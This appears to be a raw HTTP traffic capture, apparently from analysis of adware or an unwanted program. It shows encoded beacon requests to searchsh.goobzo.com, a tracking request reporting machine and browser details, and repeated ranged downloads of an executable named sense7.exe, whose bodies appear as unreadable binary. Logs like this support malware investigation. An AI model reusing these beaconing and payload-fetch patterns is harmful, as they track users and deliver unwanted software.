    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:55:03 GMT
    Connection: close
    nsdNkfdgRnki7WOE4BEO P94xAnMXXWtw/HRZPdTi6IiYhhP4leOsZE46fq 505jmO JLW
    vBjgvaQiSosY8eqiFQ7YWrGxBeYL4Ylx7Msxh7wMHkCCRkYgoicIiIMg4flXDL D5PS/v
    /nHu/QUrKKsnzQcDoBCPu2PI1o8qcMCQLohdg0CM789vji zWJ94KvpGiFFDMUwHzNQ H
    0a9OAmpLBSc5h/KDj5HDWi4acYNWxkRHN0OB sOPPMtnnUCZisWCGwk Qat/bG972juN/l
    q0nN4QMpxid4ETFg2vPZAgVrL9VXGqUYWpdWMt42TFW8tQOFydfaDsAhj7I/zyVIM6EQ9f
    C2aG6uSil 0YZOC7 jg2rb /xacWEGCeIF 7c84S0n98FOBZ3D/wIpBI4mZMCuo9cU6yDv
    owLYHhjwDKc8eYD/uZetUhfsVC48u4C6mCi6WpCfBnBIHNFGtXvHSIlK4/7tc2MCwdbMrX
    E1hcMm6rhnzrMj3AibrRp/vVt/DsSxJ97LFL8e83/IMZrR4CqhJeAyUfuzjTX7rrBY3zd
    WB57lRx6JdK1iwgzms/eXmRR8989jnnkgCW/ NixWKsIUHGXdEA7Ao3pFJl0CyEnlnHHt6
    AM0tb7uUdNsTB7skKiK/owpjxFnuxIcbVfVsKYuQZx 800CPiyAKokdJYuIgKP6Qyy8dZK
    b7vVglQObDN vUv5PGGCnCORoTgj9Gngd5mK53eOyWih0LWm1fcrG2UPf93l2BBT69EZnL
    jASFzEkFSgr8qsAvLkIS3qmkLUK4KUGxzuV1FhMlS05Tm5zJqLs3PwbQw3FmXg2NYLLU2P
    SkUbXuvgQwM4ctRycLVEUL/M6ewqOSQ/mByx693tPBymtgkDLucWFuUv64YvO9vGrtgyPQ
    sCZl5S3isKwAdmJNFKUuUwUy9YTMKKBgdIwfeexvLX4eYo7As4a2zIzSsDIPsYvXyHSoiW
    qh ArdKhHZYHR2ggF21b339L7xRYFCQMFxlUJWZpD1LffucVKNHtgdkRXpny X E53ejmy
    nLOstggOa3BU1xQqptkxTzCUZOAolp Xze0G41evFWCnWoSA7EaL2Kc4TlFu3PANeHtqBm
    eMKoZhZRWOb4CzpVSxcR4gKbClL62NWcwKgDpF24NJU3wizR56L4RQk3mUgXaxE 9gJEKz
    uYBssMM1wzECj9igBbb6FGmAr TEqef9PurILNp1aDgNaZgyLjaMVvPOun1s v9wTFcfiP
    wMIA1IjtjKCU2Wrpusv0wPctxNdKRoUDs1meVe8Cxlik1z1KOPtyGyQoKWslh0CuFuAbp1
    syf4VYxsRKGjPd72/yIkIe0SP f1PLj4mHVCgqYrHQStksFF1QOVfIkjxbNRCK5j5erHvU
    HszZCFHhaVceTKyFrhK5dSjSwYT6HTYVFYBDtoovnsWfHS8jNJfrxzEo3uYTydTV4A80Hz
    oLm2t1BFLJOKeOnCiwoc3kjEMJ9KJc47J9Ti59a35GEI1Zy8PXfFpU75J/VMDA0xl6

    <<< skipped >>>

    POST /br.ashx?pid=%s&aid=%s&ss=0&s=E64wlimyu1,74261409-fb54-436c-b597-1b09ef03540d,&v=2.1.0.81&md5=3b456ea93c832f8b2dadec75b7f745f8&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=F86D41BF-D1A5-4690-A216-28E5FBCF949C HTTP/1.0
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)
    Host: searchsh.goobzo.com
    Content-Length: 2522
    Connection: Keep-Alive
    Pragma: no-cache

    d=noFdkfdc/3Ym7WfeGKPBoA/WcAPU9MuHMR/N7u85ntBjmnbmQc1N6BJsmumK4FTgKKVgWXNYdfHiO7jXdZ2PpxGiiJm1aHQ2Zu32fzAMlNMwA0apBzp//1xuMYKK3fvP6tjr7JyfnncoU1lVKMQD8ptMRzqRsUgFyuTtIqGuS2eDBG7EbBs53HhMadd03uJ1bPd /FEXUnF/0G8eZWnfchnn1GY51VblI9d0toWUgrwjA1s K6oMhb5sn22bOXV49rYd3WUvDUDQedoyzf1BTWqkl/5qXfJvXtdvxVf5bhD OlniETKMGeEi1cTL7MbcVPMI0IyZTzEjguXm4Ysw jheFNyj63yVBFKt5r4FvM rugpeluYX1hI6kmyF5QSJG/yXQAObw9dQ/CpougsrKeNA552OdVhZXEzR8IPCQWDke3oJD7yNAqbbsrEGJv0Z8aotympKJgxO3Dsz9VK3lZX9/83T93C7VhTXiFAP2LpLVEpsBQW97KmW/4U1c5xjAd4FxR83eUE8 BBm6cCfFWuYIEsBeWSSAZ2YoagGq9TfYzsEXQDbaRzoWeK082JOnneq8tQ1bQSD Wgu5NSpIyEYTiO8xgUQTl4JMATcfoLsvbstlOOacYLhtiqNroLAvs9OdXVQKqfgDvWseiqL AZuusFW2JJvOrKj7tHMfhcJ9jMzwXkcj8zTpe doxOK9V7hCRINfuhhnlLqbUbuhkOfI0Xm3XS7EWhkmmEhEa77PRqVwlz6JNC/Lfr2NDOnfQSBFPtVxWUWakHS94NZ/8DFJo4MlHvutd3rVROZN48JP7hZeC0eIuExvz37y1p369Bdabh09OQbhcZ3RWxRPqikbWP2d/VDoL/1wO90IW9JWNeLzJhkNEHQvbF3lHCQnxigWdTQp7ebbAfgKFR3vwgiS8SEZgTXu4EAVET4ahqkRJ3bri30825 ZSdBd41MuuVqxqFh/7wAnN4KZzt8HmRo3tN00NVI1xu9TOSjFhnE6LjY1uRLAktwuXyzLyhurwWvSMHLbsd8GIIQYvXF31kUBKvbkq4VxDbj1iy6L8Ywg/RH90xmF5FMjvVusnt/zct/KJX8
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 0
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:55:08 GMT
    Connection: keep-alive


    GET /apps.gif?action=update&app=48292&bic=4252D7B4B8E54E2E95F19018ADCF24D9IE&verifier=06a66a2d5edd8e17cc634fade0ffd159&ver=1_34_05_12&installtime=1401908103&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&appver=61&bgver=1&pluginsver=56&curtime=1401908134&lifetime=31&oldappver=55&oldbgver=1&oldpluginsver=50&rnd=55 HTTP/1.1
    Accept: */*
    Host: stats.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: /Aa 59ctzhrtEL0CbYZSJX4caRb1Tut34bExvnMZey3wrwoVLOQTEtwHMW45oR1PzYXeafszRaM=
    x-amz-request-id: D4AD0E2139547920
    Date: Wed, 04 Jun 2014 18:55:39 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:56:54 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;..


    GET /sense7.exe HTTP/1.1
    Range: bytes=250000-499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Sat, 24 May 2014 17:14:53 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 250000-499999/8693594
    Age: 4822
    X-Cache: Hit from cloudfront
    Via: 1.1 1d43f56d3213a63608863fd0e49585b9.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: z_Y8CBlSfrS_CEn9hymdOcuGR72It7zOehSfMfjb9K0rSJxPkSY2mQ==
    .."..erg...#....s..~T"9.5..6T"..Q..7^T..]..,.KI>.....#\V.<%.....
    :..8._...q3=.8....).19=.[B...I......]=^.2 W.J...]s....aj...-:..kRg..P.
    ..Yk..Y...>{&.fD\X55.}......Hf./....>...O..J.24y...)"c!..F...{T3
    Q*b5.\ma.....Hpu|.i(Q>..A......)H.....3^p.L ....... .a...1......#..
    .a.1..P...F...h......`..0R......0. 1xu..d....Ma,s...][email protected]
    .(9.F%[email protected]^.Wp.$n.Mo...M.f......
    ....O.sl....eD.%..A...........v|.3......L.~x.y..>.v.<26.k.z.!...
    L.H....P...:?".?......<..J..........;>.Cv3.K...i....%.W..;......
    6z......}......;......gq\....A.F...&..0#@.......j(........Ww..-......7
    ......$.....C/b....1Z.&..1!.c... j..`..m...^`......Zr.5...p..;.T!.{.U.
    ").: ...0...".x.t...&.}.......w.'.g.YN..#...e.dY.,e..R.:.<`KD......
    2.u.;.>.........U....n...MJ]X46....8I.C/...g...E-..Rp.~D0.n,Fx..s.3
    .JC.VZ.VQ..^F.X:g.G..J..$.d...../e........s..c...&eY....T..zp.z.v..t#.
    [...7m...ap.4N..K.....o4..>..|[email protected]....%.\..TB....S...
    ...|....Y.O1..p\.8.D4RAa.......pC.*.3@.>x&.....w..\}....2..c..l...H
    .`.:x..g#.E.e.R.Xe.... \...~d.O.c..............uR.Lw....<b.....yEe\
    ....m5..\ ..p.._R:k}{;......^<.~gj3.-....j,B.H...3|.t.pT..w..B.\J..
    ..;2t.....d..?......1.5lT....r.......f.a.........O]..9.].r.....].|$..'
    .7.g$.;/...~P...y!.-....z.?.......C#...l...=z.r5..../.[jr.O.0...r.A..o
    v?.j.7.....e..7....\....k.... .Q.....$..)vz.K..9]C...C.?...C%......<
    ;( .........Gt....,...J.......8uZ....y..#.5.......... ^[K.ks.jq..}B..3
    y....T..Y.....]j=....).].....$.....k...!I...........-N...0....w ..

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=1000000-1249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Sat, 24 May 2014 17:14:53 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1000000-1249999/8693594
    Age: 4828
    X-Cache: Hit from cloudfront
    Via: 1.1 1d43f56d3213a63608863fd0e49585b9.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: u9FQhnKKBDU6-Km_MgBLBhYLJpXzqNlKpItZvSDhKQIpe4Gh_mstVA==
    jfH;....[Y.....Y....5.../........[..n.g..s.J|T....0d0(...V...........;
    .........1D`....n.....4.".]Kj..XF...{M...P...R.g.....m$.{.v......5....
    Rl."[email protected]..).^..G....f.......:..v3..9..f.....|V..J......
    .B.bE.J..E,...}..F.]..[.d.....R.<...(.....l.Ug..G.\....$....l..l..G
    ....S..y.o.qM.$Ceg>..,..].}9:(.:Et..*.%$.Xx...'..%s.!...F.1........
    .m.h.............$.n5&..r.E.c.8%S.Z.~..q.e.E..e<...........r= x!.c
    \.....pa/!....o........9...Zc..P.Dd6t..V.H?.\.[..s..L7.......L...6;.m.
    ...{.[.0.I.?Y.8.^.a.. ...d.lH.S..`...K./...r.,e%..........U.5.<I..
    x.t.......m.)...m.E5...`Y.........P9...<.q7.7..(`d|......,...=..q..
    ....<M..*.....llj...RW..........<yEL....q..w......t.......U....m
    .pa..F...W.i&=....$..XQ....F:7KM-.*.o.~..vFzr.....V.2.x...F.<..(...
    [email protected]..,...gep..~.F..j.. Z.g.L.".....<>....^.Si.a.....
    t.....n~P......V[:...._....Rr...|a.r... ..x-U....Y.y.vq.D.<.....N..
    ......u...2. l..;.V...A<.V../.....Y...`h.h.G..Qy.m............V$.p/
    q\.u*..]...........,.m...E.....~...5...!.......@......$K..N0..........
    ..('.,...W../.t.....&)...G...|.$.4O'.L)..=k .86....._.zf......Y*..{.`.
    ..%...{<$.K;WCS.Zx..S^".I1..........a......'.....T&...~.......\V2.&
    lt;A'....C..<-.M\.....\.=X............<L.&.L...>qG.1eu.@.....
    ...Z{..K..7..HB.....S.....;E.,... .....{...h....^7.........d.m!..8..T.
    -...%..rstT c.......P..5l.;.."C<..ba.?..YC....=..k..2....S..H.`.\..
    #.A.....bC?.FI...m.......d.....m.KfE)6..........q.'-.....%&.Q*...V.zR.
    .M.Z...&......?..W..=....e.MT$....*....v......._...B..0..4}.$b....

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=2000000-2249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Sat, 24 May 2014 17:14:53 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 2000000-2249999/8693594
    Age: 4834
    X-Cache: Hit from cloudfront
    Via: 1.1 1d43f56d3213a63608863fd0e49585b9.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 4AWdtm5-R0By8rvbAfyLHXKNTP4mknGYq-_HWEq7BnmpgdeARf0jzw==
    ......Z.|O M..-9.. ...%7.....fT....].W7.T..A<2.L?..GJ...5.......^~.
    .....v.....~a.1........`^!..OzO.J!(Hn.~..R..(.y.......L.[..X.-.....,..
    {% .......v.......z..g.$@....*Ok.CZ.=V....;;8}.hD_.I.....C.2..[..D.<
    ;c..F....g.-^..J..Z.|...._..................g.............kG/,....b...
    ....Z..}..2z.l.`.K.yPV>N...o..K`.*X0.D.....C....d......m...nh..n..h
    .....,...T......B_qdqG$;Jo.s.........N........^[email protected]. d\)M
    * Y.1....2..hd...N`s..~[....*.....o..V..$......?a".~.e..M.V<0.]gPy.
    .M.....9....t.2...X$.......zA....^....d. .!oD..V>...u....#{....n...
    ...-..j...."s.g...`[email protected]....!?6...Y.{>5..W..o\..b#z.>...]bv.BB
    m.jV...W.b......Rq....)E.B_...?.k%.m........O..7j....l......J.......x|
    .....g-..`t.L-..7E.Oo .....8La....ak3?l^w.......`..h..#..............
    ....W>....U.*-.c.!a............L...z.]x_..h=].#...vS...w$'..|..W...
    e...ym......7T.gb.dZ..t.....^..?,...7.:.......;.:.e |p...Ip.yg....p..N
    .lZ3Q.1.......^..m.3.......b........).1Kw...Nf#fW..0...?..F.y!wt ]J...
    .^...|5...&M#.f&..Z-.p@."...U-| ......(.z.....t..>K.........h......
    %...^."h.v...$....I.l..A[m_L.W.d SF.8...q...?n.d....B92..G... ..xx..0p
    s.(.....A..E..N...m..(.]..Cj..!....\6......W......}#..\1......>U...
    .....!.P...3\.9^N%^.dd...".....0..=-.f>....A.r./.p!.........3J.l...
    ..n............].... ..C....P!.... .Wf>..zn}..olx.St.H..*5.eV..o..@
    -.c.}......8.........t.X.1v..k.j.-..8...1..,..E.;N..O./...?B$...If.S..
    !..U..3.\..#........1...n%...p......)v\S.o.!.2[.......].X..GJve..K...F
    j.A...t.i1.......\.....g.....kpl..._..2.O.(p..T0..2.k............6

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=2750000-2999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Sat, 24 May 2014 17:14:53 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 2750000-2999999/8693594
    Age: 4838
    X-Cache: Hit from cloudfront
    Via: 1.1 1d43f56d3213a63608863fd0e49585b9.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: -hloC2sBiBj46jpOnM5C4zhJ5mLSaKGGr2SLmW8SYYOxVqTjWNksOw==
    .o.d.Z.X..i..#..t....T..m/..@.:..J...el.....=..\..y~.o3..jZ.C..$J..U4I
    #...kR.......wy....I.xP{a..^~=..( ..g....h.%..... .ot....C.K..$?..F.wW
    *[email protected]..(5...=)...A.C...nb.P.4,.&.4.M..E.u^.....i.....V..k.....
    x....}?$.DX..*....c{...~.C...4U......5?......6.3.>...m.\..h5&..t...
    .r.F..`[email protected].*[email protected]...#.Y(.......c..?Z,..il.]
    f)..,.#M.H..t..../&`..........~..@h&J.]...".....I..0.=q.|.7>...?..S
    ,..............EYL.ywP*.V.gb.|....$t....o.(..#.yR/.....*_l.^.....n.E..
    ..P..z...K.%...S.#.,....i..*.D..........(....2[. ..Y^[email protected].
    .......j..#.g.T......-h\1.12..5Y]..HMN......[.;rT.|E.=.......z...5..S9
    .UD..p..?.........iJ.c[....e.*.O............T...........).0Y..z..`.'..
    r....q.........Sn.....a..5.c>...%.[:.H......:..].....a..1.e S..pu1.
    ....O/......Z=>O ..h..o.K.......w..vUh........4...]l.N.B"P.L]'....a
    ..........Uj.gh....._.z....I#vDZz..1....F.......b.~../....9...../.g.&g
    t;...).l.....Sz..]GF.V.{{.)......o..;..t...........Q...Jz.6....a.-....
    $!j..].._.&..D8...D.b."...%...D$.Hj..{ .`.....y....Od...y....!.X..N*'@
    ..|v..b..W..H.K...Y.W...`V.cg...{..;sP..a.....X......6...3.S....."...E
    [email protected];...F..1...E..s..L...
    ...i..'...n......o. O(.X....L.x......v.r.......b..F.......s.........s.
    ...;.Z......D..0........B.{p..f.....K...0&...o8....1{Yq.......'x.2...o
    O&%.k-*...T.`?.......K...;.Y]..W[Vi.0.3...oE....5./.n..o.w...c9E.\X[.]
    ...N...]e|.f"[email protected]..%....D..r.....#......)...A1Uc......[Y...6....T..
    ....8}ddPc.6X.&/s.DX...:U...z.....,`..d.....^..vL......'..v.O..]..

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=3000000-3249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Sat, 24 May 2014 17:14:53 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 3000000-3249999/8693594
    Age: 4840
    X-Cache: Hit from cloudfront
    Via: 1.1 1d43f56d3213a63608863fd0e49585b9.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: -wCueGPu-Wjtlu0U1chUmc-TuUxkPcsJthJ20ghtNl43g1EtgtZv_A==
    h.[g..6...,3e..y..BI...H...._.Vw.'.... f.0... :m..B.....qc.t]i..oM....
    ....|.R.....V.l....h7).|R..U.?.G...F.|[email protected]..&.;8.s.IDwGyr.
    !...).b..o...7.M*..\...5..M...........}.bK..R...Y...Y..q.8".-Yh..*....
    .......F..G.GA}..C...COj...w....N.....Z.RR}qG...Y..R.R....n).g.d[9.iiK
    ...d._............B...,..S$..zO..6g...U.%vh....a...m.dR.M......O/V.q_.
    ..D%i.[$......Y..3 ....l..=...;t..b.....&...N.;......2......>.../VG
    ._.....>..5......)Y..0.e... K.GM...4hC_......\.?.k_.#.V..........l.
    .a.....9....N...c....B!.Q.Y...............(.d.Z/..x.i.amQ Y...irB.....
    /n.*.......I..K.....5..................GI.Aq_;y.C...7.......km.).X ...
    n.BN.?$.Gw..W.O..O.y..3b...y ..t..m.[..gE.......:..9.....adB[c5z...u@.
    '. ^Pg..m5*1B...E........YV..R[.....(T _...ap....leV...4...k.. k0N".6S
    <).;9..3#...2....(.W......A....,...O.......V..Ef.Lc..s.e...a...j..,
    o.*....<.q].(,.s.t.`.`.=>.L.Nt....c)..K,1r8e..s.r.Oft..Z. 8!....
    .. 3L....y...Y....(#.j..k.pV.......m..`U......d......Da...Q.Z.]OR..O..
    E..C..WV.3..~.`.q..J..(u...%..@".1.l..6.....%.o A...2..7..2..>.....
    ....)....U...c...e&...."....<...u.dK...|.TKex...4.....b.M..L..T.._.
    ....E.F.c3.....~...L-/.....`.....-V].._.%.i.........^..`..x.. j..#.k..
    L..w.YQUw...<...k.k(.2.....oay...D...s.!.M....~...0a...v..|.e.k.Q.(
    .0....s....a..[.w.C.`..t.w.2N.'..1.b.9.j..Ul.g..E....C.c....<.x5.Cf
    .a..r..@...{:.....@A9.....*.........H...&..a...0."[email protected].`.]
    .....{.#.......%V...3~|..V..1..eT... .mr...;.{......../...............
    ...."~.....(...q.....6..8a.@...^..U0,{Q..........D..g....H.;.YH."|

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=3500000-3749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Sat, 24 May 2014 17:14:53 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 3500000-3749999/8693594
    Age: 4843
    X-Cache: Hit from cloudfront
    Via: 1.1 1d43f56d3213a63608863fd0e49585b9.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: jO-gAcsxKEU_6TNUfkBXozq1Qo_Fe1ZMVVS0Pm1VlkfnZ-ehICQw1A==
    0.x......*#.YJ.D....<y0]....Cf..9...6...Z..u6.Y.m.../{#.6. ..`.1..~
    .z...5.......Ao43../...$..<..y.}....=w.......KcA$.....P......;.9OE.
    ..&y....5.X......n#]5(..Q...6.~.;..u.1..u.=.j2..M..,...D.]-$....(.S.:(
    .w.0...............c...|.NP.b..T...K.Ix.<7]...f7.4....GQ.#.]......u
    ..,..z.P..V..X8b.n...a..{4.*.PZ.................jeO|Y.....wvP..7P..X..
    [email protected].!...........>.(N....'....5....9..2o.9....u.f..h\.."ci
    {A.z.W......N.YQ....(H. .(.u.1D..fX?\KeiP7[....U.^u.".}".|<..8k.w7&
    gt;Y.s..u.Z.W<:p...M..o....c]....f....q.$..q..8...DU..8Z.T%*..Q.1H.
    .r.X.?.....5.h._2..o.B.J[|T.......]G...E..K..uw\I.i|....J......oB..Bf.
    <.Hhn.....E....P.h.U(.......gk..\fs.*........'.:yM *...............
    .La..}`....a....h....*._ ...]...i.../...:;'[email protected].....>
    ..KxM.|.^...P..jG.......y...f.?.......}.....&e%......a...."j.....i...(
    tQ. .....u.........2..k......Rd.6$k.P.{....P^..u>[email protected]
    ......f...0..S..!.8r..T.....ZP......._..P....!.y]@.K}..sM./S.yz!K....~
    ...1?......$Q.7..S.2.5....Xzw.....t.v...y.....8.m....R5.....~.........
    Si6.(...'K.!....CsE.j...^..<.s..IJ.0.&F...9.m.r.{ ..9.C.... ...k.E.
    GTq.......:.".3.......d.j.=_.b...`<op..~....Y... .>..q.S...p..vn
    ..4d..1...7Y..SOo......(...d...H..r$..`......{...G..o`....d...5....!.O
    m............(.LP..\.....;..e...~:2.o1....'.j..r.H...S.m..:[email protected].
    ..W\..z.#}W.?.L....\"xJy.7....^......gY..un=.4.....h....<c..).e.3..
    ......o...187 ..C...ID.......x.....P.".....z7...K...M.[[.bn...<..3e
    |[email protected].}8...#...C..,......o.G...A..

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=4000000-4249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Sat, 24 May 2014 17:14:53 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 4000000-4249999/8693594
    Age: 4845
    X-Cache: Hit from cloudfront
    Via: 1.1 1d43f56d3213a63608863fd0e49585b9.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 06a5rJ3vvo-yKXihguj5jvQqlAqbylSOd-nXbIbx64lwZArjWwr65g==
    Hiu.O.......7.&.*...../..x."..........4....M\1.u3D...4D..4 /..K...Z...
    5..)..9... ....L.R........X.:[..mVhk{...u.. U.j@... |......K._....K; .
    ........O..|.W..T...y..q..$......i..O...y..g..y]t..0......ek..~......&
    gt;...ba....~.G_.iV.y%...q.x^...6.....oMa...;Ni.Sg...C.c.b.h9........A
    .q...*[email protected]^G..._...L..Y..:[.A.FBy.."`SL..(.................5..B..K...
    .....`:T./.4....F.kA.c........~P..W.~..Q19.1..g..a#...q.[v........dWw.
    .............5c..g...................]P..(.WM......3a..%.9.i.S........
    ...g.......U..pI$?.<.N'G)[email protected]}.=.N
    .W....|....z.o....b....T.D<. .|.....g!.;Es....-3.r..)H1. ..D.-.....
    .?..Z.....-.#^v......G.Vi...^..C.M.G.I..[}.{..N.P...7{...dU...w!<9-
    .^..J...Y.S.....y...%..Ay.....v..d;.Uj*."'9....7...S.........$sr..^.Ta
    .......... ;..y...w.....C Kw!..h..!....*..~(........D..AG.q..rj...n...
    ."...pJ8.......l$..PO......4D..........n.F... ..6W{n..Ba.Bx.*\S.S.....
    ...!.r!..s|E0N.~..>].O.WeW.U.....s..s..........K[.....0.T=O....A|..
    .`......j...f.*..]qZ.....0.3..v..H..(.bx.Uv.a.......ah....UL...Td[E...
    ,.#.2..{#..D...l......p..a.B!oi.>c.....\.^Cg.%......dm L....n".\7..
    ....dj..l.V-..j.....)...9......V..i6..f..7..b1f.2.;.lK............e.Vy
    ..l..2'.Sb.u."...VP..w..xce-.G.....S..n.....j...=..*GJ..U.J...2....}..
    _v...>..........n....X.s=..<...^Wz....-..@w.../$..w.L.2..`q\b..r
    ..1...>r r'.9)..l..u..!..Q..9eu.5E..(..Fyb.R.?_..<...RU}....A...
    Q.....'.....F..k0.9..[.1......O.1..^i.J...K..J.>..x.-....2..o......
    .-.]."...19..pAn...F.M."..PO.0......(Q>W.....udC&....J}S.34t).c

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=4500000-4749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Sat, 24 May 2014 17:14:53 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 4500000-4749999/8693594
    Age: 4849
    X-Cache: Hit from cloudfront
    Via: 1.1 1d43f56d3213a63608863fd0e49585b9.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: DaObBhsL7qCJms87_7FHLZAUfFQ9-srwt2FQcyVuXvb6ldOf8VF4cQ==
    ......vTl..[[email protected]....]...n..d.tvAMY...^.1j...h...BZ.f..S.j7Ztg.4.p'
    .N.}-9...T.O..T..m....)yH.iC..f..%.$p..Af)}P.<c.Sq......53<....h
    n.*.....R.....g..='...X...*n.w...M....(}...O.i.X?~.W...r.....i\r....Tb
    . ...-.......l&Y.....,..0NIt.=p6Feg..^33Y.M.A.9...._.)(.>?...../sl.
    ....|...h5.M..}N.[......)...:$&...Dg.... ...*...[.6xlDz..3.......j..Vi
    ...$[Hapf.3 ..q.&. .5....,u......"&.....Y......"..lm..j0.q...u.O_T.&1.
    ..AR.V...=.._D%..o...m...0...j6..qrH..:&e@]ll..J..fB..O.l.A..1..V...&g
    t;.~.R..-........G.w..j....#.]M...~g.E..Vgc.....&..%G..ZA....}.......f
    ...G..n.......\Z.<......f.],a..0....:_......4.B.9.......X...x.W.j..
    .._...?.....O..f..Oe........!.....EV"v.d.:....R..GM..u.$..0d..A3...%.\
    .^c>b4...:...2.?..?.P....:..S.B8...$u.&PI.......Wp....G1._..y...D\.
    ...;.....t.`...... ==....8..\.t.s....c.`^.R#.....!.,...(.ag.h..pNFA.u.
    .......5...J....XVK..cq...wJ\.....Y.....n91I"......KR.....W.w.5.....1.
    ..qUxc..8..K..........}.a.P.=.q..[..T..m.k.Q w.(.....[O..0..#g...]E...
    ~q..F.Skn{1......J0..t.j._I.7"8..-...:^..g.2W.#@..zA..4 .T...-...G\..,
    . .LB.S.7..\.~!.^.......=R...oe"..].>..!..Q.C...../.?.fV.PrL.....n.
    Z...../.i...u.z...|HZ.w\x..ag.......~.........B.h[s.......r.N.......$s
    .....6*MS.F..1.}.Z....F...S-.._n.[4.Rqz...).E.....'[email protected]...
